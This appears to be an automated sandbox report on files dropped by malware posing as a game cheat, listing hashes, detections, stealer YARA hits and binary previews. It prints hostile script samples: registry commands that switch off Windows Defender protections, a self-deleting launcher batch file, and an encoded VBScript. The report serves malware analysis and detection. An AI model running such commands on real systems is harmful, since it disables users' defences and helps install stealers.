                                      MD5:FE86BB9E3E84E6086797C4D5A9C909F2
                                      SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
                                      SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
                                      SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                      Process:C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):235008
                                      Entropy (8bit):6.052066943195521
                                      Encrypted:false
                                      SSDEEP:6144:tloZM+rIkd8g+EtXHkv/iD4OUCKbhS6FOAxDeebn4b8e1mSTi:voZtL+EP8OUCKbhS6FOAxDeebAo
                                      MD5:06129FFC46E854930CFCAA754CA1D487
                                      SHA1:E7C173C48AA107EC63BD6F9030C9EC6FE889D832
                                      SHA-256:10D28E18A7DF4B2C30E05E5E361F1724E0B6EA8C021D8105EE30354BE79B98D1
                                      SHA-512:B7121A2A65F317EDBC1B4DD8DEC427C277FAD2B521A211D1408BC06B79431C418DAD32ED61481C5EF49511CD167846E026A86147AE77BD9B0E607918FEB66AB9
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 84%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`.................................@...K.......P...........................$................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B................p.......H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...
                                      Process:C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2618108
                                      Entropy (8bit):7.520085871796446
                                      Encrypted:false
                                      SSDEEP:49152:UbA30txAAnyf8vPgcj+Sx5j2KKcnhhhMssVDpx:Ub5xAWsGPgcjXKcnhhTsZ
                                      MD5:6E01D4882274684F48E04436103AD57F
                                      SHA1:3B88DF5FC9E6973BF3ECB1E2ED759B86774CB290
                                      SHA-256:424497764BC1E2CD57F454D173DCEEB9DCD7F900AAF5060110DA629D11FADF8D
                                      SHA-512:3E5ED6EE7458F4662DD9BBE572620FC591E69FBC6D8E98013EC0F39A95EB9DA55561A232EEA23192FBC59368B99F99EE6A00DF23BCFF253C327AA3EB607C7D7E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 66%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):7888384
                                      Entropy (8bit):7.978075960572594
                                      Encrypted:false
                                      SSDEEP:196608:i9FITY7Wgr4pQTsRB/DejGIKpj57IOTj0cnue:4FN96LRB/DejGHtIOTofe
                                      MD5:B76057DF968A944446F950DD4DDC6AEC
                                      SHA1:BB64DE1C677368764000D34C29528EAD2F48405C
                                      SHA-256:AFE91FEA04D39DE5710AD065252D13B9DF7B7BD25788DDF5AFB162A2F0A03296
                                      SHA-512:7F45198FE05013CEAB477784BDE2B1C4532607BD8BA8D9CFB09C5BB037DD2616086C8CB3AFD669B24EC89EEDBD270D00F1BD6BCE2644B40ED36B8F32FC5FDB31
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 83%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....^B*.....................r.......|K......0....@..........................0O..................@.................../.O....6..............................................................45.......................G.x...........................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.vmp0....J..........................`..`.vmp1....Xx......Zx.................`..`.....................................................................................................................................................$..............@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\FixTsDfhiC.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):13304832
                                      Entropy (8bit):7.991054831548809
                                      Encrypted:true
                                      SSDEEP:393216:aJlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8:abQpgssCKInwjJaM
                                      MD5:7DB5128F7A81CC1AF094D8898E79FF21
                                      SHA1:D503984331D5999C14931C267D859FBD1510C282
                                      SHA-256:2952FA4AB9BC3E2B04B1F3AB6B648D0D23FA74856C50BF21FB13FDDFE9A874BB
                                      SHA-512:CACEEC284B71DF124D47267E5CA42BF84E558AA9606B0186F132FBA8D2BEAD2DDBD9304CD82761270B6C42271E0937AEFF605EF5D865C424CC29B39CA05B123A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 75%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....^B*......................x.....l.q......0....@...........................v..................@......................O...t.t......pv.P7....................................................n.......................r.x...........................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.vmp0...............................`..`.vmp1...0...........................`..`.rsrc...P7...pv..8..................@..P.............................................................................................................$..............@..P........................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):211
                                      Entropy (8bit):5.2013909867484625
                                      Encrypted:false
                                      SSDEEP:6:hITg3Nou11r+DE8RN5OwAiBuCSKOZG1wkn23f+iMH:OTg9YDEANEwAEzIfk
                                      MD5:E5D6AB7B38B044D3F12F05915DDDB8B9
                                      SHA1:E97633BDC36361D15686A57449A95FEAD9DE5F6B
                                      SHA-256:E3ABC61BBE121E90EEFEEA1B3B6417BC69F2297320A39C368FCA2E53E45A241E
                                      SHA-512:0FB394BD3DEF72F7E262B1E8CF0D36FFF0B3ECF529D770B81608322BC21F876BCCBC45F94BA0AC126D71C9BB269956681F01D9E3314A1E1087AED91B5A3DE83E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Nu8jJRNGRr.bat"
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.213660689688185
                                      Encrypted:false
                                      SSDEEP:3:WOW1cb:vW2b
                                      MD5:599052E719673372AD89EB43715E9B57
                                      SHA1:0EE11A83D21607E70FA7288932FB8985A599F09D
                                      SHA-256:89F673145D936E0112BDF585932BDF12445392BC22EF2D04D0B81496C96F337D
                                      SHA-512:075DC25BE760999B78A5FF0A95F043FA004C33135B072CC0E1CD9CD81A64B78A757CAB5D234E9DD242D0C920CCA771F5D13F5E191C844F3A29D315BE9D4876B4
                                      Malicious:false
                                      Preview:URpTmppKDfykDYFHTIetjZEXE
                                      Process:C:\Users\user\Desktop\FixTsDfhiC.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):3135
                                      Entropy (8bit):5.017771879220886
                                      Encrypted:false
                                      SSDEEP:96:5UKNozkU9yryxh2VokttSTKlAHlRFH4rPNJLoJ:bD0
                                      MD5:4C35B71D2D89C8E8EB773854085C56EA
                                      SHA1:EDE16731E61348432C85EF13DF4BEB2BE8096D9B
                                      SHA-256:3EFEEAAABFD33FF95934BEE4D6D84E4ECB158D1E7777F6EECD26B2746991ED42
                                      SHA-512:A6CCBB2913738CA171686A2DD70E96330B0972DADB64F7294AC2B4C9BB430C872ED2BCD360F778962162B9E3BE305836FA7F6762B46310C0AD4D6EF0C1CDAC8D
                                      Malicious:true
                                      Preview:reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protecti
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (571), with no line terminators
                                      Category:dropped
                                      Size (bytes):571
                                      Entropy (8bit):5.85640612719744
                                      Encrypted:false
                                      SSDEEP:12:x315FiPpXlKCmSK5oIs/8uZEYWPaL4aNpUM/AZ9jTzveKczznx:x3jFiRgq+oZ0uZgS4aNpZoWzznx
                                      MD5:2687BFC181F1B096694CA63AA4488E39
                                      SHA1:02C36C262D529E8B4101B5AD4B81A7E7737DE15E
                                      SHA-256:3C1E9F14B43EEAED612CFE42399F003A8235D7CBA99DA53B85067973C2C75399
                                      SHA-512:6110DF6742062FB09BC2926C29B012EEE4E7A24C9D7011239D162E7BDE3699AC9197AEE5E32FA5277EA658CB76EA6733CCE772F730794FE94628D61E3E9547E7
                                      Malicious:false
Preview:
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):163
                                      Entropy (8bit):5.704453811784881
                                      Encrypted:false
                                      SSDEEP:3:rpv9gWj0C4zQDm8chxRpnQdUwaa9hBkhm9fRWmktNzYwMig9mtjivw:9v9pbbmNQdPaa902TktN8Adivw
                                      MD5:4CDDE345C191B9FA4A05E7BE5B955C2B
                                      SHA1:E07B7193D45C96B662D3E45515798E37F7DE3ACF
                                      SHA-256:A2106E2E11F30CB200C1BB939A39A68249C29317EB9CAE2AC8BA69BD6C2A789C
                                      SHA-512:A1396108244EABC95E75C469D731BBA03CC498285673BE51819999B9EEE0E571E6ACD65C13E65853E08AFD3230CDA8D3EF3315ED800B19855E632F4F26F8B8DA
                                      Malicious:false
                                      Preview:Q7LJXEem0sywQiFKuRXtcS6QV5fn7Yw3snbBp8QmmcyyeLL17hFgpLr8B5xcj1ob54EnGDfwAuG9dIwKtnqaTQOg5dAtKyDvyX3jGiu3CSf4Fre2Jms5LOIoqhrmDvlMqULGPMEL3wYAuTbO9HkiGIkjOO3i0H0QrTN
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):215
                                      Entropy (8bit):5.786343948557994
                                      Encrypted:false
                                      SSDEEP:6:+iwg5y6F/xUCZESSks9fVRWma7L/cTNXY:z15yQZZKn9fVRDuL/gNo
                                      MD5:F2D54BA219F7A2A6AEB303CBB1309048
                                      SHA1:F8931A51602FC011AC361A3B568C5A28F740407F
                                      SHA-256:5297F09D78106918D27F22A202CB5F09CC3B8A1331607468237738B878574373
                                      SHA-512:187353B27EC9142B91226B57397ACEB5801254ED21ECEB1A9658DADC1FFE9B7F09F7FC3398201E0C7C8A00EAFA2245BB87394D943A181CB57561A249749AC8AF
                                      Malicious:false
                                      Preview:iNrL0rV3Chhgirqaec1bUsqIPbj4aw3fCrxozKwmRbwyZTzSsTZyep20gj6YHbdPoCe03CkTqOK252s5lQMGWEBXy7HPOXe08hJXz9YqsGIQe94o1Ax1OW3jBHB64UEStU4YsVGm1gXP6v2yCdYNknllnjWs7bvYB0gKFf5g4K9s8nnQOM3a61rGsSvJ8Ypau9NGOrthh2Sao2n96GduiVb
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (844), with no line terminators
                                      Category:dropped
                                      Size (bytes):844
                                      Entropy (8bit):5.904049219234194
                                      Encrypted:false
                                      SSDEEP:12:HMiCHNnot14/DIISakcQSYxrSRTfKabssTfemlrm6C581lJX15OTOLiew+:HMiQVk14/FNDYyvPJC6C56JX1OOLiej
                                      MD5:BF7CC67DC60B2FE406B836407603F7B1
                                      SHA1:99D43001D975CB71BACBBE293994AD9F7E516687
                                      SHA-256:862F264E0293455209F7CACD0A52D06AE38ED05A84326F0CBBE133AC363E1989
                                      SHA-512:51B8C54CAE46F5F57068E395F7BD1DB8CC6A89A0BB5D77AB53648664B461F31073D88F9E2ECC52B8AE28DCE37B3EFAF03DAC4C1075DC43D4A395B31CAAA095AA
                                      Malicious:false
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (933), with no line terminators
                                      Category:dropped
                                      Size (bytes):933
                                      Entropy (8bit):5.882878605603488
                                      Encrypted:false
                                      SSDEEP:24:sB2z2tC3m6Lb+ojiIke4qqcyd8QzNP9U8S20a:i2z13nn+oiIkhN8QPBSHa
                                      MD5:F5B3C7249CF2BFFF5E772E6D669A27A5
                                      SHA1:9A0C8E676709002C3E0E05A4A569A909455C3B09
                                      SHA-256:6379E1113AA7451DAF7AD786BB019278DC8E1871A5CEDE201FACFC430A183D29
                                      SHA-512:A7A828A9AC97AAE8721A4680F3AB70247751DE0384568BE060F0BE91C5938A2F42E8BEBB4B58D42438446E2A9703E0F93BE762EDD39CD171E162CEC80A74D8D4
                                      Malicious:false
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (828), with no line terminators
                                      Category:dropped
                                      Size (bytes):828
                                      Entropy (8bit):5.91211970465077
                                      Encrypted:false
                                      SSDEEP:24:zYx/zPcnRcz5Sm0jHYNnrhl+xf+Cs5g5d3li1:abkRcz5Sm+YNT+xfpoYX+
                                      MD5:1D57200EBD2758598804BEAED4072619
                                      SHA1:A6C5CAD2E445548C21208E060B4A1DFEBD532422
                                      SHA-256:C3CE52B6C99B5BA9215F96D228552DAC6C4E066CEDBE0FE0FE3EE7CBC9602FF0
                                      SHA-512:464A677925683C1C6F43852DE58FBC089882B7A603D6FD88C9669E2A5F8B9AC01F30F950E78A3199F108DB6569169798FDAEF4245812FE93FA9776667F8568E6
                                      Malicious:false
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (893), with no line terminators
                                      Category:dropped
                                      Size (bytes):893
                                      Entropy (8bit):5.906728732362466
                                      Encrypted:false
                                      SSDEEP:24:OEuDf/cxZCAr1R55e1Fsnq+0cvDd5ol3Plfv:buz/cvCG1R55qWfv5O3
                                      MD5:41AB28131C43D6E3D8112BAC2FCF8FC6
                                      SHA1:0CEE78D3766C1E3899B7CCAAEEE69FE69712ADBC
                                      SHA-256:291CC08147DF2F0CCED0C65424A5386FDA496DD6374F6263853A6BD458B15DE4
                                      SHA-512:8F15F84F43B62AE9C7C10FF58488030951AB1CE35ECD82A86CA4A13B9D231120D2AE934BEFD9692EAB285F22A6689D77417FFA7D0EECF65B99B8794BCB93A167
                                      Malicious:false
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):163
                                      Entropy (8bit):5.624660673500774
                                      Encrypted:false
                                      SSDEEP:3:keJKvbJiH8zUz+O9uCAkaUHiuhN3oNjpPqUP6gwHQwi4w8d/55:keJK1k8I19uCBfiu7gjpnPawU5
                                      MD5:5F7295A9E004ADF1CF6455953577AF9C
                                      SHA1:D7A5BB99A46837369F1041C9CE42F7C62FB7299A
                                      SHA-256:000196373C8F4CCC0869E4FB254E9FCFCD5E1F83DFDEF182D93E4DD19C0FE6CF
                                      SHA-512:CE2C3FE19D6728D0AB70E0F84D6B66541519CDFAE981B8DAFC9C93737A48FB1FAE36EF4EEB71E7E1DDB9B14ABFD5D05411F2EB619F92C66A46E7C28D7F04A7B0
                                      Malicious:false
                                      Preview:xLnigBr4ge8CmTOJfbgoJihTaDlzmHlbYVSwGqJg8X9aXPccn8YoFqAOnUIca1RZ3gnQAbDzRAqviG6KlIMot7WrVDJwhrGHFkh0lLbL4iXFAOqhX71Ronq6K657SRSj3iq8iGjZqBtKkQrGXmYj0ycc3lppQe3nQxL
                                      Process:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):221
                                      Entropy (8bit):5.769434304613929
                                      Encrypted:false
                                      SSDEEP:6:G5kgwqK+NkLzWbHhE18nZNDd3RL1wQJR673gMmYY:G6BMCzWLy14d3XBJk3g4Y
                                      MD5:CA2CAE3C10113FC32484A48196E2FFAA
                                      SHA1:8EB74A53FE655C5B538246F42CC078D8900BF215
                                      SHA-256:98311058614DD00A0D0E9E9C38F9DF5D1D951525741FC46901D1A396BADDD8F2
                                      SHA-512:6CF05CA56F4C6320BC490401E742F81230E6C138651D958776F497D5E4889FE16C5853A1864791A3F10B4B3D103F5218894BE4C7009D1EB7B32E243111B166AF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:#@~^xAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v%T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JujH/O.:GDk7+u&4^W^3S+8&:rNMC%51MWA}2q3UkhZu4O+#Mc8lDJS~Z~PWC^/nhj4AAA==^#~@.
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
